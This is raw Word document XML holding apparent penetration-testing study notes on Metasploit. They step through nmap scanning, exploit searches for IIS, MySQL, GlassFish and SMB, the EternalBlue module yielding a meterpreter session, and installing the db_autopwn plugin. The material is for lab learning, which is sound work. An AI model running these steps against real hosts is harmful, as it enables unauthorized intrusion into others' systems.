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8F18C" w14:textId="5708E4DA" w:rsidR="00853ABF" w:rsidRPr="00C436FD" w:rsidRDefault="00245919">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C436FD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability scanning with MSF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9B2C0" w14:textId="77777777" w:rsidR="00245919" w:rsidRDefault="00245919"/>
    <w:p w14:paraId="6B58AF10" w14:textId="4440F5A5" w:rsidR="002A4F2E" w:rsidRDefault="002A4F2E">
      <w:r>
        <w:t>Auxiliary and exploit module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EE4C9" w14:textId="5C21B399" w:rsidR="00C436FD" w:rsidRDefault="00C436FD">
      <w:r>
        <w:t>Use module to perform the vulnerability analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9BC764" w14:textId="77777777" w:rsidR="00C436FD" w:rsidRDefault="00C436FD"/>
    <w:p w14:paraId="72D0F575" w14:textId="723D2228" w:rsidR="00245919" w:rsidRPr="00840931" w:rsidRDefault="00840931">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840931">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361871D" w14:textId="5106E68C" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="4CDA366C" w14:textId="580258A0" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FB0067D" w14:textId="695932D0" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t>#-sn does the ping only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBB4B8" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="2819D020" w14:textId="76746601" w:rsidR="00840931" w:rsidRDefault="00840931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220A43E6" w14:textId="3377D73B" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB1A2C" w14:textId="57DEBEA2" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BEC2D37" w14:textId="177228E2" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t xml:space="preserve"># check that database is connected </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703DEC16" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="441A1AD4" w14:textId="6B0EB7CB" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="51D8D798" w14:textId="06D3CB46" w:rsidR="00840931" w:rsidRDefault="00840931" w:rsidP="00840931">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">RHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000819F7" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="6F06ACC0" w14:textId="5DCC11DE" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t>Workspace -a ms3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D46FEA" w14:textId="56F98D09" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000A1DC9">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F41625D" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="09F9C4D6" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t xml:space="preserve">Hosts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60826558" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t xml:space="preserve">#target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ip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mac ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C2DC9" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="42DEAE36" w14:textId="4905AB92" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE8D7F" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t># show service discovered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5712B476" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>name:Microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F1D145" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="5173BC90" w14:textId="0E68584E" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>name:Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479E991" w14:textId="0A7B48B3" w:rsidR="00840931" w:rsidRDefault="00840931">
      <w:r>
        <w:t xml:space="preserve"># it takes time to find the exploit for the specific </w:t>
      </w:r>
      <w:r w:rsidR="00D2110F">
        <w:t xml:space="preserve">service </w:t>
      </w:r>
      <w:r>
        <w:t>version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262EAB28" w14:textId="77777777" w:rsidR="00840931" w:rsidRDefault="00840931"/>
    <w:p w14:paraId="406B2EBF" w14:textId="4A0FF89D" w:rsidR="00840931" w:rsidRDefault="00D2110F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sun glassfish </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567AB8B8" w14:textId="0C1C73DF" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t>Use (index no/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255AC985" w14:textId="4D1949F7" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t xml:space="preserve">Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1156C3FA" w14:textId="066CF10D" w:rsidR="00D2110F" w:rsidRPr="00D2110F" w:rsidRDefault="00D2110F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> give </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a detailed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> information about the modules </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>that it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>able</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the  specific</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> service </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D2110F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>version .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7741F105" w14:textId="77777777" w:rsidR="00D2110F" w:rsidRDefault="00D2110F"/>
    <w:p w14:paraId="30BF20AE" w14:textId="33E7C151" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t>Set payload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</w:p>
    <w:p w14:paraId="02D1F5A4" w14:textId="77777777" w:rsidR="00D2110F" w:rsidRDefault="00D2110F" w:rsidP="00D2110F">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036E65E5" w14:textId="3A0EA151" w:rsidR="00D2110F" w:rsidRDefault="00D2110F"/>
    <w:p w14:paraId="27241621" w14:textId="7459EFCB" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t>Back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34E40E" w14:textId="77777777" w:rsidR="00D2110F" w:rsidRDefault="00D2110F"/>
    <w:p w14:paraId="7CC9235E" w14:textId="7989E023" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E86957C" w14:textId="77777777" w:rsidR="00D2110F" w:rsidRDefault="00D2110F"/>
    <w:p w14:paraId="7B8BE739" w14:textId="10C8A4B6" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t># new tab on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8A5BD" w14:textId="77777777" w:rsidR="00D2110F" w:rsidRDefault="00D2110F"/>
    <w:p w14:paraId="161E6526" w14:textId="45758D80" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “Microsoft window SMB” | grep -e “Me</w:t>
      </w:r>
      <w:r w:rsidR="00CA58BE">
        <w:t>tasploit</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DD4E4" w14:textId="1D56D8CE" w:rsidR="00D2110F" w:rsidRDefault="00D2110F">
      <w:r>
        <w:t xml:space="preserve">#limit only to show the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A221678" w14:textId="77777777" w:rsidR="00CA58BE" w:rsidRDefault="00CA58BE"/>
    <w:p w14:paraId="61CABCAD" w14:textId="5F05C46D" w:rsidR="00CA58BE" w:rsidRDefault="00CA58BE">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6556958D" w14:textId="4F957415" w:rsidR="00CA58BE" w:rsidRDefault="00CA58BE">
      <w:r>
        <w:t>Use (index no/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>name)</w:t>
      </w:r>
      <w:r w:rsidR="00F64EDB">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F64EDB">
        <w:t xml:space="preserve"> auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BC98F" w14:textId="3EFC74A7" w:rsidR="00CA58BE" w:rsidRDefault="00F64EDB">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78822675" w14:textId="0F81B3F1" w:rsidR="00F64EDB" w:rsidRDefault="00F64EDB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446BF9DF" w14:textId="77777777" w:rsidR="00F64EDB" w:rsidRDefault="00F64EDB"/>
    <w:p w14:paraId="42E025C0" w14:textId="2ACB988C" w:rsidR="00F64EDB" w:rsidRDefault="00F64EDB">
      <w:r>
        <w:t xml:space="preserve">Back </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65147783" w14:textId="688D33F6" w:rsidR="00F64EDB" w:rsidRDefault="00F64EDB" w:rsidP="00F64EDB">
      <w:r>
        <w:t>Use (index no/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>name) #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D39B8D3" w14:textId="77777777" w:rsidR="00F64EDB" w:rsidRDefault="00F64EDB" w:rsidP="00F64EDB">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A74677F" w14:textId="77777777" w:rsidR="00F64EDB" w:rsidRDefault="00F64EDB" w:rsidP="00F64EDB">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6728CE9D" w14:textId="49BE4F1B" w:rsidR="00D2110F" w:rsidRDefault="003F3B6D">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5BF73" w14:textId="77777777" w:rsidR="003F3B6D" w:rsidRDefault="003F3B6D"/>
    <w:p w14:paraId="4AEEBF80" w14:textId="4011185D" w:rsidR="003F3B6D" w:rsidRDefault="003F3B6D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F90D544" w14:textId="40ACB624" w:rsidR="003F3B6D" w:rsidRDefault="003F3B6D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00EDF452" w14:textId="7CE8D328" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDBD097" w14:textId="7BDC048B" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:r>
        <w:t>Back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC8B18" w14:textId="77777777" w:rsidR="00C31415" w:rsidRDefault="00C31415"/>
    <w:p w14:paraId="25D395D4" w14:textId="0FAB115E" w:rsidR="00C31415" w:rsidRPr="00C31415" w:rsidRDefault="00C31415">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31415">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autopwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31415">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F0C18" w14:textId="753E6099" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:r>
        <w:t xml:space="preserve">Identify the exploit modules </w:t>
      </w:r>
      <w:r w:rsidR="000A1DC9">
        <w:t>for currently</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> open</w:t>
      </w:r>
      <w:r w:rsidR="000A1DC9">
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4A058" w14:textId="4EC529FE" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:r>
        <w:t xml:space="preserve">Check the database and match the open services and provide the list of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that you will use against it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2B15D" w14:textId="750CBF9F" w:rsidR="00C31415" w:rsidRPr="000A1DC9" w:rsidRDefault="00C31415">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A9701" w14:textId="0436FA6D" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31415">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="002E01B0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54DCE314" w14:textId="26AEA3CA" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:r w:rsidRPr="00C31415">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>metasploit-autopwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EC04DE5" w14:textId="7EA4ADD7" w:rsidR="00C31415" w:rsidRDefault="00C31415">
      <w:r w:rsidRPr="00C31415">
        <w:t xml:space="preserve">cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>db_autopwn.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31415">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C31415">
        <w:t>-framework/plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4648530B" w14:textId="77777777" w:rsidR="00C31415" w:rsidRDefault="00C31415"/>
    <w:p w14:paraId="5568637B" w14:textId="393D5CAA" w:rsidR="00EF2F03" w:rsidRPr="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">now in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875B989" w14:textId="610CA53D" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:r>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>db_autopwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6097F6D1" w14:textId="1280DB40" w:rsidR="00F3419B" w:rsidRDefault="00F3419B">
      <w:r>
        <w:t># to load it into the MSF plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6FFE3" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03"/>
    <w:p w14:paraId="51C87E1A" w14:textId="647B66D8" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>db_autopwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BDBA14A" w14:textId="730AFE00" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:r>
        <w:t>#Using it, it shows the help menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6CD77" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03"/>
    <w:p w14:paraId="4D882692" w14:textId="6ECF4D64" w:rsidR="00EF2F03" w:rsidRPr="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">#It </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interact</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>database ,and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF2F03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with the information in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B47A93" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03"/>
    <w:p w14:paraId="1698EA79" w14:textId="3AC7532E" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_autopwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p -t </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8B40EC" w14:textId="493B76F3" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>enumerate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit for each of the open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01B1DF" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03"/>
